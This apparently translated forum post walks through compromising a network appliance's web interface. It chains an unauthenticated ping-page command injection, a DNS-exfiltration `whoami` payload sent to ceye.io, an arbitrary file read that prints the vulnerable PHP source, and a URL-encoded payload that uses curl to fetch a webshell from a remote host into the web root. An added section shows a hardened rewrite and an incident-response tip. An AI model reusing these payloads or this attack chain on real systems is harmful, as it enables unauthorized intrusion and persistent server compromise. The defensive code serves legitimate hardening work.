中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Web security in practice: getting a webshell through an OS command injection vulnerability

Author: admin    Time: 2022-3-31 01:39
**1. Finding a way in**

**Right-clicking to view the page source showed that a fingerprint of this system is images/select_bg.png; searching for it on ZoomEye (钟馗之眼) gives the following:**

![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Both reporter and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) use this fingerprint. I had worked on this kind of system before and had its source code; comparing against the source directory turned up an unauthenticated page.**
**The address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**, as shown:**

![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Testing the ping function here showed that commands could be executed beyond ping's normal behaviour; the payload was:**

`` `whoami`.1111.ceye.io ``**, as shown:**

![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The DNS record that came back is shown below:**

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**This shows that the current user is root.**
**2. Getting a webshell by chaining vulnerabilities**

**This article follows the order in which the bugs were found. Next, the pwd command was run to obtain the web path, as shown:**

![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The site path is: /var/www/html/view/systemconfig/systemtool/**

**Using Burp Suite, I found one OS command injection vulnerability and one arbitrary file read vulnerability; the screenshot below is of the arbitrary file read:**

![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The OS command injection is in /var/www/html/view/Behavior/toQuery.php. This path was obtained through the command execution of the first step (bypassing the ping function). Using the arbitrary file read vulnerability, we read its source code:**

![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The source code is:**
```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php
session_start ();

if ($_GET ["objClass"] == "")
      exit ();

$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm") {
      $param ["user"] = $_SESSION ["s_userName"];
      $param ["lan"] = $_SESSION ["lan"];
      $param ["regUserpath"] = $_SESSION ["regUserpath"];

      exec ( "rm -rf /tmp/cache" );

      // objClass and method come straight from the query string and are
      // appended to the command line without quoting or validation
      $cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
      $cmd .= " " . $_GET ["objClass"];
      $cmd .= " " . $_GET ["method"];
      $cmd .= " " . base64_encode ( json_encode ( $param ) );

      // the full command line is written to disk before it is run
      file_put_contents("/tmp/query_cmd",$cmd);

      // sink: the request-controlled string is handed to a shell
      exec ( $cmd . " > /dev/null &" );
} else {
      require_once ($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
      $obj = new QueryInterface ();
      $instance = $obj->getInstance ();
      $instance->invokeMethod ( $_GET ["objClass"], $_GET ["method"], $param );
}

exit ();
?>
```
**A quick audit shows that in `if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm")`, whenever method equals one of getList, import or processAlarm, the script builds `$cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";`, that is, cmd is the absolute web path plus system/behavior/behavior_query.php; it then appends the objClass and method query parameters to it verbatim and writes the result with `file_put_contents("/tmp/query_cmd",$cmd);`.**

**Finally `exec ( $cmd . " > /dev/null &" );` runs it. This hands us a parameter for command injection and is a direct OS command injection vulnerability. See my demonstration below:**
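As an added example (not code from the post or from the vendor), here is the same command construction rewritten so that `method` is checked against an exact allowlist, `objClass` is restricted to class-name characters, and every argument passes through escapeshellarg() before exec(); the function and constant names are assumed.

```php
<?php
// Added example (not the vendor's code or the post author's): the command
// construction from toQuery.php with request values constrained before they
// reach exec(). Assumed names: buildQueryCommand(), ALLOWED_METHODS.
const ALLOWED_METHODS = ['getList', 'import', 'processAlarm'];

// Returns the command line for behavior_query.php, or null when the request
// fails validation. $get stands in for $_GET so the check runs from the CLI.
function buildQueryCommand(array $get, array $param, string $docRoot): ?string
{
    $objClass = $get['objClass'] ?? '';
    $method   = $get['method'] ?? '';
    // Array-valued parameters (objClass[]=...) are refused, not stringified.
    if (!is_string($objClass) || !is_string($method)) {
        return null;
    }
    // Exact-match allowlist: the same three strings the original if() tests,
    // compared strictly so nothing else takes the shell branch.
    if (!in_array($method, ALLOWED_METHODS, true)) {
        return null;
    }
    // objClass is meant to be a PHP class name: letters, digits, underscore.
    // '|', ';', '`', '$(', quotes and whitespace are all rejected, so the
    // chained-pipe input shown above can never parse as shell syntax.
    // \z rather than $ so a trailing newline is rejected as well.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $objClass)) {
        return null;
    }
    $script  = rtrim($docRoot, '/') . '/system/behavior/behavior_query.php';
    // $param travels as base64(JSON) as in the original; that alphabet is
    // already shell-safe, but quoting it too costs nothing.
    $payload = base64_encode(json_encode($param));
    // escapeshellarg() single-quotes each argument, so the shell receives
    // four literal arguments and no metacharacters from the request.
    return '/usr/local/php/bin/php '
        . escapeshellarg($script) . ' '
        . escapeshellarg($objClass) . ' '
        . escapeshellarg($method) . ' '
        . escapeshellarg($payload);
}

// Constructed inputs: a legitimate request, then an objClass carrying shell
// metacharacters of the kind used in the write-up above.
$docRoot = '/var/www/html';
$param   = ['user' => 'demo', 'lan' => 'en'];
$good    = ['objClass' => 'Behavior', 'method' => 'getList'];
$bad     = ['objClass' => 'Behavior||`true` #', 'method' => 'getList'];
echo buildQueryCommand($good, $param, $docRoot), PHP_EOL;
echo var_export(buildQueryCommand($bad, $param, $docRoot), true), PHP_EOL;
```

The original also writes the complete command line to /tmp/query_cmd before running it, so on an affected host that file holds the most recent injected request and is worth preserving during incident response.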
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**In the screenshot, the objClass= parameter has the OS command injection. I had tried a bash reverse shell before, but after a night of testing it never connected back, so in the end I chose to download the webshell with curl. The payload is as follows:**

**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**
**URL-decoded, it reads:**
```
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```
**So many pipe characters | are used to close out whatever quoting surrounds the injection point; in the end curl downloaded the webshell successfully, as shown:**

![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**3. Summary**
**The reason this case ended in a webshell is largely down to combining several vulnerabilities. First, viewing the page source identified which system the target runs, since I had tested a similar program before. Then, targeting that system, the unauthenticated ping page was found, and by bypassing the ping function's normal behaviour the pwd command was run to get the site's absolute path. Next, the arbitrary file read vulnerability was used to read the PHP file suspected of OS command execution and audit it briefly, which confirmed the vulnerability. Finally an OS command execution payload was built and a webshell obtained. The whole process was a chain of vulnerabilities; penetration testing often comes down to luck, and if any one of these links had not existed or had not been found, getting the webshell might have failed.**
**In short, luck and bug-hunting skill matter equally. Thanks for reading!**




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2